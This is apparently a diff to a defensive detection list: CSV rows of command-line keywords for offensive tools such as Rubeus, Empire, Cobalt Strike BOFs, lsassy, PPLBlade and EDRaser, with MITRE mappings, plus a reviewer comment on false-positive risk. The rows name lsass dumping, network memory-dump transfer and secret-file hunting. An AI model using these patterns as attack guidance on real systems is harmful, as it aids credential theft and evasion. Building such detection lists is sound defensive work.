Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* dump --bucket *--dump-dir*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"* dump * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* dump --bucket *--dump-dir*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" "* dump_memory64*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","0","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" -"* --dump-adcs*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" -"* -DumpCerts *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -DumpCreds *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* dumper.ps1*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","262","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" -"* --dump-gmsa*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" -"* --dump-laps*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - 
T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* --dump-adcs*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* -DumpCerts *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -DumpCreds *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* dumper.ps1*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation 
Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"* --dump-gmsa*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* --dump-laps*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" "* --dumpmode network --network raw --ip * --port *","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "* --dumpmode network --network smb *","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" -"* --dump-name *lsass*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential 
Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"* --dump-name *lsass*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "* --dumpname lsass.dmp*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "* duplicates.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"* -e pfx p12 pkcs12 pem key crt cer csr jks keystore key keys der *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"* -e ppk rsa pem ssh rsa*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"* e2e_test.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"* -e pfx p12 pkcs12 pem key crt cer csr jks keystore key keys der *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"* -e ppk rsa pem ssh rsa*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"* e2e_test.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* eap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ebowla.py*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "* edge logindata *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" 
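Review bot: The `"* e2e_test.py*"` row for NetExec keeps severity `10` with endpoint detection enabled, but the keyword is a generic test-script name that any project's end-to-end tests would match, so a hit on it says little about NetExec being present. The `"* dumper.ps1*"` row in this hunk has the same weakness to a lesser degree. This refresh only touches the popularity, star, fork and timestamp columns, so both rows still carry `"N/A"` in `metadata_comment`. Consider setting that field to something like `"high risks of false positives"`, or narrowing the keyword to a path specific to the repository, so consumers of the list can down-weight the match.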
@@ -556,40 +556,40 @@
 "* edraser.py*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z"
 "* EfsPotato*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
 "* Egress-Assess's FTP server*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation
tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
-"* -ElevatedPersistenceOption *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* -ElevatedPersistenceOption *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source.
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
 "* emailall.py*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z"
 "* empire.arguments*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration
Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
 "* empire.client.*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 -
T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
